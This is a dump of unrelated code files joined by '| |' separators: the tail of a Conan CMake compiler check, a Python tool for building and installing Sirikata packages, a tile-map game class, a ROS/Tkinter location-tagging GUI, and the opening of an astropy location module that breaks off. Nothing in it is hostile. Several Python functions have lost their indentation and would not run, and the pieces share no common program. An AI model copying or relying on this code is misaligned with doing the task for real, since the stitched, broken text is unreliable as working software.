(CONAN_COMPILER_VERSION STREQUAL "6" AND NOT VERSION_MAJOR STREQUAL "12") )
conan_error_compiler_version()
endif()
elseif(CONAN_COMPILER STREQUAL "gcc" OR CONAN_COMPILER MATCHES "clang")
if(NOT ${VERSION_MAJOR}.${VERSION_MINOR} VERSION_EQUAL CONAN_COMPILER_VERSION)
conan_error_compiler_version()
endif()
else()
message("Skipping version checking of not detected compiler...")
endif()
endfunction()
function(conan_check_compiler)
if(NOT DEFINED CMAKE_CXX_COMPILER_ID)
if(DEFINED CMAKE_C_COMPILER_ID)
message(STATUS "This project seems to be plain C, using '${CMAKE_C_COMPILER_ID}' compiler")
set(CMAKE_CXX_COMPILER_ID ${CMAKE_C_COMPILER_ID})
set(CMAKE_CXX_COMPILER_VERSION ${CMAKE_C_COMPILER_VERSION})
else()
message(FATAL_ERROR "This project seems to be plain C, but no compiler defined")
endif()
endif()
if(CONAN_DISABLE_CHECK_COMPILER)
message(STATUS "WARN: Disabled conan compiler checks")
return()
endif()
if(NOT DEFINED CONAN_COMPILER)
conan_get_compiler(CONAN_COMPILER CONAN_COMPILER_VERSION)
if(NOT DEFINED CONAN_COMPILER)
message(STATUS "WARN: CONAN_COMPILER variable not set, please make sure yourself that "
"your compiler and version matches your declared settings")
return()
endif()
endif()
if( (CONAN_COMPILER STREQUAL "Visual Studio" AND NOT CMAKE_CXX_COMPILER_ID MATCHES MSVC) OR
(CONAN_COMPILER STREQUAL "gcc" AND NOT CMAKE_CXX_COMPILER_ID MATCHES "GNU") OR
(CONAN_COMPILER STREQUAL "apple-clang" AND (NOT APPLE OR NOT CMAKE_CXX_COMPILER_ID MATCHES "Clang")) OR
(CONAN_COMPILER STREQUAL "clang" AND NOT CMAKE_CXX_COMPILER_ID MATCHES "Clang") )
message(FATAL_ERROR "Incorrect '${CONAN_COMPILER}', is not the one detected by CMake: '${CMAKE_CXX_COMPILER_ID}'")
endif()
if(NOT DEFINED CONAN_COMPILER_VERSION)
message(STATUS "WARN: CONAN_COMPILER_VERSION variable not set, please make sure yourself "
"that your compiler version matches your declared settings")
return()
endif()
check_compiler_version()
endfunction()
"""
| |
import util
import packageconfig
import os
import subprocess, tempfile
import datetime
import shutil
# Package utilities
def packages_path(*args):
    '''
    Get path to the packages directory, or to an entry beneath it.

    Bug fix: the declared *args were previously ignored; they are now
    joined onto the packages directory, so packages_path() is unchanged
    for existing zero-argument callers while extra components work as
    the signature advertises.
    '''
    return util.data_path('packages', *args)
def package_path(package, *args):
    '''
    Get path to a package's data directory, or to a file within it.
    '''
    # Assemble the full component list once, then delegate to util.
    components = ('packages', package) + args
    return util.data_path(*components)
def package_load_config(package):
    """
    Load and return the configuration module for the given package.
    """
    config = util.load_config(packageconfig, 'packages', package)
    return config
def install_dir(packname):
    # Directory where the package's built binaries are installed:
    # .../packages/<packname>/<packageconfig.install_dir_name>.
    return package_path(packname, packageconfig.install_dir_name)
# Package commands
def command_package_init(*args):
"""
admin package init package_name
Initialize a new package of Sirikata. Packages are a build of
Sirikata you might want to execute multiple services from. This
command sets up the basic directory structure for a package,
including a customizable configuration file which you probably
want to edit after running this command.
"""
if len(args) == 0:
print 'No package name specified'
return 1
packname = args[0]
# Setup build, install, and data directories
util.ensure_dir_exists(package_path(packname))
# Touch an empty config.py where the user can adjust settings
config_py_file = open(package_path(packname, 'config.py'), 'w')
config_py_file.close()
return 0
def command_package_ls(*args):
    """
    admin package ls

    List packages found in this deployments data directory. Includes a
    * if they appear to be properly built/installed.

    Always returns 0.
    """
    # Every directory under the packages root is a candidate package.
    package_dirs = os.listdir(packages_path())
    for packname in package_dirs:
        # Filter to directories with config files
        if not os.path.isdir(package_path(packname)): continue
        if not package_load_config(packname): continue
        # Check for installation
        installed_flag = ''
        installdir = install_dir(packname)
        bindir = os.path.join(installdir, 'bin')
        # This is just a very basic sanity check for binaries we
        # require.  The "or []" yields an empty list when bin/ is absent,
        # since "exists and listdir" would otherwise evaluate to False.
        binfiles = (os.path.exists(bindir) and os.listdir(bindir)) or []
        # Installed means both a space server and an object host binary
        # (release or debug variant) are present.
        if ( ('space' in binfiles or 'space_d' in binfiles) and
             ('cppoh' in binfiles or 'cppoh_d' in binfiles) ):
            installed_flag = '*'
        print packname, installed_flag
    return 0
def command_package_build(*args):
    """
    admin package build deployment_name

    Build the given deployment, generating the installed
    version. Unless the deployment is bare, this doesn't do anything
    to update the code or dependencies.

    Returns 0 on success, 1 if any build step fails.
    """
    if len(args) == 0:
        print 'No package name specified'
        return 1
    packname = args[0]
    package_load_config(packname)
    # Layout: <package>/<build_dir>/{dependencies, build/cmake}
    builddir = package_path(packname, packageconfig.build_dir_name)
    depsdir = os.path.join(builddir, 'dependencies')
    buildcmakedir = os.path.join(builddir, 'build', 'cmake')
    installdir = install_dir(packname)
    try:
        # If nothing is there yet, do checkout and build
        # dependencies. Otherwise, just make sure our repo is fully
        # up-to-date.
        if not os.path.exists(package_path(packname, packageconfig.build_dir_name, '.git')):
            subprocess.check_call(['git', 'clone', packageconfig.repository, package_path(packname, packageconfig.build_dir_name)])
        else:
            subprocess.check_call(['git', 'fetch', 'origin'], cwd=builddir)
        # Make sure we're on the requested branch
        subprocess.check_call(['git', 'checkout', packageconfig.version], cwd=builddir)
        # We always need to make sure deps are up to date, either for
        # a fresh checkout or because we may have switched
        # branches/versions. This includes making sure the submodules
        # are up to date.
        subprocess.check_call(['make', 'update-dependencies'], cwd=builddir)
        subprocess.check_call(['make'] + packageconfig.dependencies_targets, cwd=depsdir)
        # We need to select whether to use cmake with tools (ccache),
        # or just bare cmake. Using ccache in some setups can be
        # counterproductive, and if we add support for things like
        # distcc/icecream, we'll probably want to filter in some other
        # conditions. These are heuristics for choosing whether or not
        # to use ccache.
        cmake_cmd = './cmake_with_tools.sh'
        # Heuristic: ccache on NFS-mounted filesystems tends to hurt,
        # so fall back to plain cmake if any NFS mount is present.
        if 'nfs' in subprocess.Popen(['mount'], stdout=subprocess.PIPE).communicate()[0].split():
            cmake_cmd = 'cmake'
        # Normal build process, making sure we clean out any previous config
        subprocess.check_call(['rm', '-f', 'CMakeCache.txt'], cwd=buildcmakedir)
        subprocess.check_call([cmake_cmd,
                               '-DCMAKE_INSTALL_PREFIX='+installdir,
                               '-DCMAKE_BUILD_TYPE='+packageconfig.build_type]
                              + packageconfig.additional_cmake_args + ['.'],
                              cwd=buildcmakedir)
        subprocess.check_call(['make'] + packageconfig.additional_make_args, cwd=buildcmakedir)
        subprocess.check_call(['make', 'install'] + packageconfig.additional_make_args, cwd=buildcmakedir)
    except subprocess.CalledProcessError:
        # Any failed step aborts the build.
        return 1
    return 0
def command_package_install(*args):
"""
admin package install deployment_name url
Install a prebuilt version of Sirikata locally (as opposed to
building and installing locally.
"""
if len(args) == 0:
print 'No package name specified'
return 1
packname = args[0]
package_load_config(packname)
if len(args) < 2:
print "Must specify a URL to install from"
return 1
binary_url = args[1]
depdir = package_path(packname)
installdir = package_path(packname, packageconfig.install_dir_name)
tempdir = os.path.join(tempfile.gettempdir(), 'sirikata-deploy-' + str(datetime.datetime.now().time()))
os.mkdir(tempdir)
try:
subprocess.check_call(['curl', '-O', binary_url], cwd=tempdir)
fname = binary_url.rsplit('/', 1)[1]
if fname.endswith('tar.gz') or fname.endswith('tgz'):
subprocess.check_call(['tar', '-xzvf', fname], cwd=tempdir)
elif fname.endswith('tar.bz2'):
subprocess.check_call(['tar', '-xjvf', fname], cwd=tempdir)
elif fname.endswith('zip'):
subprocess.check_call(['unzip', fname], cwd=tempdir)
else:
print "Don't know how to extract file", fname
return 1
# Figure out where the actual install is since archives
# frequently have a layer of extra directories
curdir = tempdir
while True:
subdirs = [x for x in os.listdir(curdir) if os.path.isdir(os.path.join(curdir, x))]
if 'bin' in subdirs:
break
assert(len(subdirs) == 1)
curdir = os.path.join(curdir, subdirs[0])
# Now swap the directory we found into place
if os.path.exists(installdir): shutil.rmtree(installdir)
shutil.move(curdir, installdir)
# Cleanup
shutil.rmtree(tempdir)
except subprocess.CalledProcessError:
return 1
return 0
def command_package_destroy(*args):
"""
admin package destroy package_name
Destroy a package, i.e. remove all its contents from the filesystem.
"""
if len(args) == 0:
print 'No package name specified'
return 1
packname = args[0]
package_load_config(packname)
packdir = package_path(packname)
if not os.path.exists(packdir):
return 1
shutil.rmtree(packdir)
return 0
| |
from FieldPos import *
from NPC import *
import random
class Field:
    """A square tile map for one game area.

    storage is a sizex x sizey grid of FieldPos tiles addressed as
    storage[x][y].  Terrain is encoded as strings ('1' grass, '3*' water,
    '3_h*' village houses, '5*'/'8*'/'9'/'11'... zone-specific tiles —
    presumably; exact art mapping lives in FieldPos/assets, confirm there).
    Construction order matters: village placement, then zone terrain, then
    road carving, then player start.
    """
    def __init__(self,sizex,sizey,plr,ztype):
        # plr doubles as the "village mode" flag: 1 = full village,
        # 2 = small village (zone 1 only), 0 = plain field.
        self.vil=plr
        self.ztype = ztype
        self.sizex = sizex
        self.sizey = sizey
        self.monsters = []
        self.npcs = []
        # Tiles reserved by village buildings; zone/road generation skips them.
        self.vilposes=[]
        #creating and filling storage for field points
        self.storage=[]
        # Terrain codes the player may stand on.
        self.walkable=['1','2','4','5','6','7','9','10','2_1','13']
        for i in range(0,sizex):
            tmp=[]
            self.storage.append(tmp)
            for j in range(0,sizey):
                # Every tile starts out as plain grass ('1').
                self.storage[i].append(FieldPos(i,j,'1'))
        random.seed()
        if(self.vil==1):
            self.make_vil()
        if(self.vil==2 and self.ztype==1):
            self.make_smallvil()
        self.make_zone(ztype)
        self.clear_paths(ztype)
        self.set_player_start()
        #self.print_task('player')

    def make_smallvil(self):
        """Place a 2x2 mini-village at one of two fixed spots, plus one NPC."""
        qpos = random.randint(1,2)
        if(qpos==1):
            nwpos=(1,2)
        elif(qpos==2):
            nwpos=(7,2)
        for i in range(0,2):
            for j in range(0,2):
                self.storage[i+nwpos[0]][j+nwpos[1]].set_terrain('1')
                self.vilposes.append((i+nwpos[0],j+nwpos[1]))
        # House tiles ('3_h_*') on top of the cleared patch.
        self.storage[nwpos[0]+1][nwpos[1]].set_terrain('3_h_w')
        self.storage[nwpos[0]][nwpos[1]].set_terrain('3_h_s')
        npc = NPC((nwpos[0],nwpos[1]+1),str(random.randint(2,3)))
        self.add_npc(npc)

    def make_vil(self):
        """Place the full 6x6 village at a fixed position, plus one NPC."""
        sx=self.sizex
        sy=self.sizey
        nwpos=(2,2)
        # Clear a 6x6 patch and reserve it against zone/road generation.
        for i in range(0,6):
            for j in range(0,6):
                self.storage[i+nwpos[0]][j+nwpos[1]].set_terrain('1')
                self.vilposes.append((i+nwpos[0],j+nwpos[1]))
        # 2x2 main house built from quarter tiles '3_h_1'..'3_h_4'.
        for i in range(3,5):
            for j in range(0,2):
                if(i==3):
                    if(j==0):
                        self.storage[i+nwpos[0]][j+nwpos[1]].set_terrain('3_h_1')
                    elif(j==1):
                        self.storage[i+nwpos[0]][j+nwpos[1]].set_terrain('3_h_4')
                if(i==4):
                    if(j==0):
                        self.storage[i+nwpos[0]][j+nwpos[1]].set_terrain('3_h_2')
                    elif(j==1):
                        self.storage[i+nwpos[0]][j+nwpos[1]].set_terrain('3_h_3')
        # Additional fixed buildings (well, barns, tree — presumably).
        self.storage[6][4].set_terrain('3_h_w')
        self.storage[7][2].set_terrain('3_h_b')
        self.storage[7][3].set_terrain('3_h_b2')
        self.storage[3][6].set_terrain('3_h_t')
        npc = NPC((2,6),'1')
        self.add_npc(npc)

    def add_monster(self,monster):
        # Register a monster living on this field.
        self.monsters.append(monster)

    def kill_monster(self,monster):
        # Remove a dead monster; raises ValueError if it is not present.
        self.monsters.pop(self.monsters.index(monster))

    def ret_monsters(self):
        # Accessor for the live monster list (not a copy).
        return(self.monsters)

    def add_npc(self,npc):
        self.npcs.append(npc)

    def clear_paths(self,ztype):
        """Carve a horizontal road at y=4 and a vertical one at x=4.

        Water tiles crossed by the road become bridges; village tiles are
        left untouched.  The water/road/bridge codes depend on the zone.
        """
        if(ztype==1):
            water=['3','3_1','3_2','3_3','3_4','3_5','3_6','3_7','3_8']
            road='2'
            bridge='2_1'
        elif(ztype==3):
            water=['8','8_1','8_2','8_3','8_4','8_5','8_6','8_7','8_8']
            road='7'
            bridge='10'
        elif(ztype==2):
            water=['5_1','5_2','5_3','5_4','5_5','5_6','5_7','5_8']
            road='5'
            bridge='5'
        elif(ztype==4):
            water=['11']
            road='13'
            bridge='13'
        for i in range(0,self.sizex):
            if(((i,4) not in self.vilposes)):
                if(self.storage[i][4].get_terrain() in water):
                    self.storage[i][4].set_terrain(bridge)
                else:
                    self.storage[i][4].set_terrain(road)
                if(ztype==4):
                    # Lava zone: add a road-edge tile below the road.
                    self.storage[i][5].set_terrain('12')
        for j in range(0,self.sizey):
            if(((4,j) not in self.vilposes)):
                # Only zone 3 uses bridges on the vertical road.
                if(self.storage[4][j].get_terrain() in water and ztype==3):
                    self.storage[4][j].set_terrain(bridge)
                else:
                    self.storage[4][j].set_terrain(road)

    def set_player_start(self):
        """Pick the player's starting tile (fixed in a village, else random walkable)."""
        if(self.vil==1):
            self.pposx=4
            self.pposy=4
            # NOTE(review): this early return skips set_player(), so the
            # village start tile never gets its player flag — confirm
            # whether that is intentional.
            return
        # Rejection-sample random tiles until a walkable one is found.
        while(1):
            random.seed()
            self.pposx = random.randint(0,self.sizex-1)
            self.pposy = random.randint(0,self.sizey-1)
            if(self.storage[self.pposx][self.pposy].get_terrain() in self.walkable):
                break
        self.storage[self.pposx][self.pposy].set_player()

    def make_zone(self,zone):
        """Fill the grid with zone-specific terrain (1 grass+lakes, 2 desert,
        3 snow+frozen lakes, 4 lava), then decorate water edges."""
        vil = self.vil
        if(vil==2):
            vil = 0
        random.seed()
        if(zone==1):
            # Scatter rectangular lakes of plain water ('3'), skipping
            # village tiles; more/larger lakes when a full village exists.
            lakes=random.randint(4+vil*3,6+vil*3)
            for k in range(0,lakes):
                sizex=random.randint(3+vil*3,4+vil*3)
                sizey=random.randint(3+vil*3,4+vil*3)
                nwpos=(random.randint(0,self.sizex-sizex),random.randint(0,self.sizey-sizey))
                for i in range(0,sizex):
                    for j in range(0,sizey):
                        if((i+nwpos[0],j+nwpos[1]) not in self.vilposes):
                            self.storage[i+nwpos[0]][j+nwpos[1]].set_terrain('3')
            sizex=self.sizex
            sizey=self.sizey
            if(self.vil==0):
                # Without a village, force a grass border around the map.
                for i in range(0,sizex):
                    for j in range(0,sizey):
                        if(i==0):
                            self.storage[i][j].set_terrain('1')
                        if(i==sizex-1):
                            self.storage[i][j].set_terrain('1')
                        if(j==0):
                            self.storage[i][j].set_terrain('1')
                        if(j==sizey-1):
                            self.storage[i][j].set_terrain('1')
            # Replace plain water with shoreline variants ('3_1'..'3_8')
            # chosen from the grass neighbours.
            for i in range(0,sizex):
                for j in range(0,sizey):
                    if(self.storage[i][j].get_terrain()!='3'):
                        continue
                    # NOTE(review): at i==0 / j==0 the -1 index wraps to the
                    # far edge of the grid (Python negative indexing).
                    left=self.storage[i-1][j].get_terrain()
                    top=self.storage[i][j-1].get_terrain()
                    try:
                        right=self.storage[i+1][j].get_terrain()
                    except:
                        # Off the right edge: mirror the left neighbour.
                        right=left
                    try:
                        down=self.storage[i][j+1].get_terrain()
                    except:
                        down=top
                    if(left=='1' and top=='1'):
                        self.storage[i][j].set_terrain('3_2')
                    elif(right=='1' and top=='1'):
                        self.storage[i][j].set_terrain('3_4')
                    elif(left=='1' and down=='1'):
                        self.storage[i][j].set_terrain('3_8')
                    elif(right=='1' and down=='1'):
                        self.storage[i][j].set_terrain('3_6')
                    elif(left=='1'):
                        self.storage[i][j].set_terrain('3_1')
                    elif(top=='1'):
                        self.storage[i][j].set_terrain('3_3')
                    elif(right=='1'):
                        self.storage[i][j].set_terrain('3_5')
                    elif(down=='1' or '3_h' in down):
                        self.storage[i][j].set_terrain('3_7')
        if(zone==2):
            # Desert: fill with '5', pick corner/edge variants by position.
            for i in range(0,self.sizex):
                for j in range(0,self.sizey):
                    self.storage[i][j].set_terrain('5')
                    if(i==0 and j==0):
                        self.storage[i][j].set_terrain('5_2')
                    elif(i==0 and j==self.sizey-1):
                        self.storage[i][j].set_terrain('5_8')
                    elif(i==self.sizex-1 and j==0):
                        self.storage[i][j].set_terrain('5_4')
                    elif(i==self.sizex-1 and j==self.sizey-1):
                        self.storage[i][j].set_terrain('5_6')
                    elif(i==0):
                        self.storage[i][j].set_terrain('5_1')
                    elif(j==0):
                        self.storage[i][j].set_terrain('5_3')
                    elif(i==self.sizex-1):
                        self.storage[i][j].set_terrain('5_5')
                    elif(j==self.sizey-1):
                        self.storage[i][j].set_terrain('5_7')
            # Sprinkle a few obstacles ('5_9'/'5_10') away from the border.
            obsts=random.randint(3,7)
            for i in range(0,obsts):
                px=random.randint(1,self.sizex-2)
                py=random.randint(1,self.sizey-2)
                obst=random.randint(9,10)
                self.storage[px][py].set_terrain('5_'+str(obst))
        if(zone==3):
            # Snow: base '9' with rectangular frozen lakes of '8'.
            for i in range(0,self.sizex):
                for j in range(0,self.sizey):
                    self.storage[i][j].set_terrain('9')
            lakes=random.randint(4,6)
            for k in range(0,lakes):
                sizex=random.randint(3,4)
                sizey=random.randint(3,4)
                # Lakes are kept one tile away from the far edges.
                nwpos=(random.randint(0,self.sizex-1-sizex),random.randint(0,self.sizey-1-sizey))
                for i in range(0,sizex):
                    for j in range(0,sizey):
                        self.storage[i+nwpos[0]][j+nwpos[1]].set_terrain('8')
            sizex=self.sizex
            sizey=self.sizey
            # Force a snow border, then decorate lake edges ('8_1'..'8_8').
            for i in range(0,sizex):
                for j in range(0,sizey):
                    if(i==0):
                        self.storage[i][j].set_terrain('9')
                    if(i==sizex-1):
                        self.storage[i][j].set_terrain('9')
                    if(j==0):
                        self.storage[i][j].set_terrain('9')
                    if(j==sizey-1):
                        self.storage[i][j].set_terrain('9')
            for i in range(0,sizex):
                for j in range(0,sizey):
                    if(self.storage[i][j].get_terrain()!='8'):
                        continue
                    # Safe to index directly: the border pass above
                    # guarantees no '8' on the outermost ring.
                    left=self.storage[i-1][j].get_terrain()
                    top=self.storage[i][j-1].get_terrain()
                    right=self.storage[i+1][j].get_terrain()
                    down=self.storage[i][j+1].get_terrain()
                    if(left=='9' and top=='9'):
                        self.storage[i][j].set_terrain('8_2')
                    elif(right=='9' and top=='9'):
                        self.storage[i][j].set_terrain('8_4')
                    elif(left=='9' and down=='9'):
                        self.storage[i][j].set_terrain('8_8')
                    elif(right=='9' and down=='9'):
                        self.storage[i][j].set_terrain('8_6')
                    elif(left=='9'):
                        self.storage[i][j].set_terrain('8_1')
                    elif(top=='9'):
                        self.storage[i][j].set_terrain('8_3')
                    elif(right=='9'):
                        self.storage[i][j].set_terrain('8_5')
                    elif(down=='9'):
                        self.storage[i][j].set_terrain('8_7')
        if(zone==4):
            # Lava zone: uniform '11'; roads are carved later by clear_paths.
            sizex=self.sizex
            sizey=self.sizey
            for i in range(0,sizex):
                for j in range(0,sizey):
                    self.storage[i][j].set_terrain('11')

    def print_task(self,task):
        # Small debug/reporting helper used by move_player and __init__.
        if(task=="player"):
            self.storage[self.pposx][self.pposy].output_str('pos')
        if(task=="out"):
            print("No such point on field")

    def move_player(self,newx,newy):
        """Move the player flag to (newx, newy) if inside the grid."""
        self.storage[self.pposx][self.pposy].unset_player()
        # NOTE(review): only the upper bound is checked; negative indices
        # would silently wrap — confirm callers never pass them.
        if(newx<self.sizex and newy<self.sizey):
            self.pposx = newx
            self.pposy = newy
            self.storage[self.pposx][self.pposy].set_player()
        else:
            self.print_task("out")

    def cur_cond(self):
        # Expose the raw tile grid (not a copy).
        return self.storage

    def size(self):
        # (width, height) of the field.
        return self.sizex,self.sizey

    def terrains(self):
        """Return the distinct terrain codes currently present on the field."""
        terrains=[]
        for i in range(0,self.sizex):
            for j in range(0,self.sizey):
                if(self.storage[i][j].get_terrain() not in terrains):
                    terrains.append(self.storage[i][j].get_terrain())
        return terrains
| |
#!/usr/bin/env python
import rospy
from std_msgs.msg import String
from Tkinter import *
import Tkinter as tk
#from TkTreectrl import * #To use this terminal: apt-get install tktreectrl
import tkMessageBox as msg
import tf.transformations
from geometry_msgs.msg import PoseStamped
from geometry_msgs.msg import PoseWithCovarianceStamped
from geometry_msgs.msg import PointStamped
import os
def MsgBox(title, text, style):
    """Show a Tk message box; *style* 0-6 selects the dialog type.

    Returns the dialog result, or None for an out-of-range style.
    """
    dialogs = (
        msg.showinfo, msg.showwarning, msg.showerror,
        msg.askquestion, msg.askyesno, msg.askokcancel, msg.askretrycancel,
    )
    # Create and immediately hide a root window so the dialog has a parent.
    tk.Tk().withdraw()
    if style in range(7):
        return dialogs[style](title, text)
def AddOnClick(event):
    """ADD-button handler: store the most recently tagged pose under the
    name typed in the entry, and append it to the visible list."""
    global locationName
    global latestPose
    global latestOrientation
    global nameArray
    global poseArray
    global quaternion
    name= locationName.get()
    pose= latestPose
    orientation= latestOrientation
    quaternion=latestQuaternion
    # (0,0,0)/(0,0,0,0) are the "nothing tagged yet" sentinels set at startup.
    if(name!=''and pose!=(0,0,0)and quaternion!=(0,0,0,0)):
        locationName.labelText =""
        locationName.delete(0, 'end')
        nameArray.append(name)
        poseArray.append(pose)
        # orientationArray/quaternionArray are only mutated in place, so
        # they work without a 'global' declaration.
        orientationArray.append(orientation)
        quaternionArray.append(quaternion)
        warnLabel.config(text="")
        nameList.insert(nameList.size() ,"name: " +name+" "+" pose: (" +str(pose.x)+","+str(pose.y)+","+str(pose.z)+") "+" quaternion: " +str(quaternion))
    elif (pose==(0,0,0) or quaternion==(0,0,0,0)):
        #print "Please tag a point on the map first."
        warnLabel.config(text="Please tag a point on the map.")
    elif name=="":
        #print "Please type location name"
        warnLabel.config(text="Please type location name.")
def deleteOnClick(event):
    """DELETE-button handler: remove the selected listbox rows and shift the
    parallel name/pose/orientation/quaternion arrays down to match."""
    global nameList
    items = nameList.curselection()
    pos = 0
    for i in items :
        # Earlier deletions shift later indices down by one each; 'pos'
        # compensates so 'idx' stays aligned with the listbox.
        idx = int(i) - pos
        nameList.delete( idx,idx )
        pos = pos + 1
        # Shift every entry after idx one slot left in all four arrays...
        for j in range(idx,(nameArray.__len__()-1)):
            nameArray[j]=nameArray[j+1]
            poseArray[j]=poseArray[j+1]
            orientationArray[j]=orientationArray[j+1]
            quaternionArray[j]=quaternionArray[j+1]
        # ...and blank the now-duplicated tail slot (arrays keep their
        # length; saveOnClick skips None entries).
        nameArray[nameArray.__len__()-1]=None
        poseArray[nameArray.__len__()-1]=None
        orientationArray[nameArray.__len__()-1]=None
        quaternionArray[nameArray.__len__()-1]=None
    # NOTE(review): raises NameError if nothing was selected (idx unbound).
    print "delete "+str(idx)
    print nameArray
def openFile(event):
f = open('locationPoint', 'w')
for line in f:
print line
def saveOnClick(event):
    """SAVE-button handler: write all tagged locations to locationPoint.txt
    (CSV: name,x,y,z,qx,qy,qz,qw) next to this script, then publish the
    file path on the 'WPsOK' topic."""
    # pubDataStaus("updating")
    #print __file__
    dir = os.path.dirname(__file__)
    #print dir
    filename = dir+'/locationPoint.txt'
    #print filename
    ##for checking
    # if os.path.isfile(filename):
    #     print "locationPoint.txt "+"exists"
    # else:
    #     print "locationPoint.txtv "+"not exist"
    # Mode 'w' already truncates; the explicit truncate() below is redundant
    # but harmless.
    f = open(filename,'w')
    # else:
    #     try:
    #         f = open('locationPoint.txt','r+') # Trying to create a new file or open one
    #     except:
    #         print('new text file error')
    f.truncate()
    for j in range(0, nameArray.__len__()):
        # Slots blanked by deleteOnClick are None and are skipped.
        if nameArray[j] is not None:
            s = (nameArray[j]+ ","
                +str(poseArray[j].x)+","
                +str(poseArray[j].y)+","
                +str(poseArray[j].z)+","
                +str(quaternionArray[j].x)+","
                +str(quaternionArray[j].y)+","
                +str(quaternionArray[j].z)+","
                +str(quaternionArray[j].w)+"\n")
            #print s
            f.writelines(s)
    #print "done"
    global filePath
    filePath.config(text="File path: "+filename)
    f.close()
    # Tell listeners where the updated waypoint file lives.
    pubDataStaus(os.path.dirname(__file__)+'/locationPoint.txt')
def loadOnClick(event):
    # TODO: loading saved locations back into the list is not implemented.
    pass
def getPoseData(data):
    """ROS callback for PoseWithCovarianceStamped messages: cache the latest
    tagged position/quaternion/Euler angles and show them in the GUI."""
    print "getten"
    global latestPose
    latestPose = data.pose.pose.position
    global latestQuaternion
    latestQuaternion = data.pose.pose.orientation
    #print("Point Position: [ %f, %f, %f ]"%(latestPose.x, latestPose.y, latestPose.z))
    #print("Quat Orientation: [ %f, %f, %f, %f]"%(latestQuaternion.x, latestQuaternion.y, latestQuaternion.z, latestQuaternion.w))
    global latestOrientation
    # Convert the quaternion to Euler angles for human-readable display.
    latestOrientation = tf.transformations.euler_from_quaternion([latestQuaternion.x, latestQuaternion.y, latestQuaternion.z, latestQuaternion.w])
    #print("Euler Angles: %s"%str(latestOrientation))
    global poseLabel
    global nameList
    saveString = ("latest goal position: "+str(latestPose)+"\n Orientation: "+str(latestOrientation)+"\n")
    poseLabel.config(text=saveString)
def subscribePose():
    """Subscribe to pose estimates tagged in RVIZ (the '/initialpose' topic)."""
    rospy.Subscriber('/initialpose', PoseWithCovarianceStamped, getPoseData)
    # rospy.Subscriber('/move_base_simple/goal', PoseStamped, getPoseData)
    # No-op: 'background' is never assigned in this function, so this
    # declaration has no effect; kept from the original.
    global background
def pubDataStaus(dataStatus):
    """Publish *dataStatus* on the 'WPsOK' topic.

    NOTE(review): a fresh Publisher is created on every call; in ROS a
    message published immediately after creating a Publisher can be lost
    before subscribers connect — consider a module-level publisher.
    """
    pub = rospy.Publisher('WPsOK', String, queue_size=10)
    pub.publish(dataStatus)
def subscribePoint():
    # Listen for points tagged with RVIZ's "Publish Point" tool (debug only).
    rospy.Subscriber('/clicked_point', PointStamped, printclickpoint)
def printclickpoint(data):
    # Debug callback: dump the clicked point coordinates to stdout.
    print "clicked_point"
    print data.point
def on_closing():
    """Window-close handler: confirm, then tear down Tk and the ROS node."""
    if msg.askokcancel("Warning", "Do you want to quit?"):
        background.destroy()
        rospy.signal_shutdown("")
# --- Shared module state, updated by the ROS callback and the Tk handlers ---
# Parallel arrays: index j describes one tagged location.
nameArray=[]
poseArray=[]
orientationArray=[]
quaternionArray=[]
# Sentinel values meaning "nothing tagged yet" (tested in AddOnClick).
latestPose=(0,0,0)
latestOrientation=(0,0,0)
latestQuaternion=(0,0,0,0)

# --- Main window ---
background = tk.Tk()
#tk.iconbitmap(r'c:\Python32\DLLs\py.ico') #set icon
background.wm_title("Location Config")
background.geometry('{}x{}'.format(900,800))# window size
background.resizable(width=True, height=True) #window resizable
background.protocol("WM_DELETE_WINDOW", on_closing)

# F1: usage hints banner.
F1=Frame(background, height=60,width=600)
F1.pack()
titleLabel = Label(F1,text="Hints: 1. Press '2D Nav Goal' in RVIZ.\n2. Click the location you want to tag.\n3. Type the name of location below and press 'ADD' \n",justify=LEFT,relief=RIDGE,width=80)
titleLabel.pack()

# F2: live display of the last tagged pose (updated by getPoseData).
F2=Frame(background, height=20,width=900)
F2.pack()
poseLabel =Label(F2,text="Click the location you want to tag in RVIZ")
poseLabel.pack()

# F3: name entry + ADD button + warning label.
F3=Frame(background, height=20,width=900)
F3.pack()
nameLabel = Label(F3, text="Location Name")
nameLabel.grid(row=0, column=0)
locationName = Entry(F3, bd =5)
locationName.grid(row=0, column=1)
okBtn = Button(F3, text="ADD")
okBtn.grid(row=0, column=2)
okBtn.bind('<Button-1>', AddOnClick)
warnLabel = Label(F3,text='',fg = "red",bg = "yellow")
warnLabel.grid(row=0, column=3)

# F4: scrollable list of tagged locations.
F4=Frame(background, height=200,width=600)
F4.pack()
scrollbar = Scrollbar(F4)
scrollbar.pack( side = RIGHT, fill=Y )
nameList =Listbox(F4,relief=RIDGE,width=600,height=30,yscrollcommand = scrollbar.set )
# for line in range(5):
#     nameList.insert(END, "Location " + str(line))
nameList.pack( side = LEFT, fill = BOTH )
scrollbar.config( command = nameList.yview )

# F5: DELETE / SAVE / LOAD buttons and the saved-file path display.
F5=Frame(background, height=200,width=600)
F5.pack()
deleteBtn = Button(F5, text="DELETE")
deleteBtn.grid(row=0, column=0)
deleteBtn.bind('<Button-1>', deleteOnClick)
filePath = Label(F5,justify=LEFT,width=80,text="FILE PATH:")
filePath.grid(row=0, column=1)
saveBtn = Button(F5, text="SAVE")
saveBtn.grid(row=0, column=2)
saveBtn.bind('<Button-1>', saveOnClick)
# NOTE(review): the LOAD button reuses the name 'saveBtn'. Harmless at
# runtime (Tk keeps the widget alive), but confusing — consider renaming.
saveBtn = Button(F5, text="LOAD")
saveBtn.grid(row=0, column=3)
saveBtn.bind('<Button-1>', loadOnClick)

if __name__ == '__main__':
    rospy.init_node('gui', anonymous=False)
    # Quit the Tk loop when ROS shuts down (e.g. Ctrl-C on the node).
    rospy.on_shutdown(background.quit)
    subscribePose()
    subscribePoint()
    background.mainloop()
    rospy.spin()
| |
"""
An implementation for the core concept location for astronomic spaces
:author: Fenja Kollasch, 06/2017
"""
from coreconcepts import CcLocation
from astropy.coordinates import SkyCoord
from astropy.coordinates import EarthLocation
from astropy.coordinates import ICRS
from astropy.coordinates import AltAz
from astropy.coordinates import BarycentricTrueEcliptic
from astropy.coordinates import Galactic
from astropy.time import Time
from astropy import units as u
from enum import Enum
import math as m
# Types for location
class CRS(Enum):
    """
    Celestial Reference Systems

    Each member pairs the astropy frame name with the reference point the
    frame is anchored to (see REFPOINTS below).
    """
    # International celestial reference system. Equivalent to equatorial coordinates
    ICRS = ('icrs', 'sosy barycenter')
    # Horizontal coordinates. Relative to observer. Often used for observation
    HORIZONTAL = ('altaz', 'observer')
    # Ecliptic coordinates. Used for objects orbiting the sun
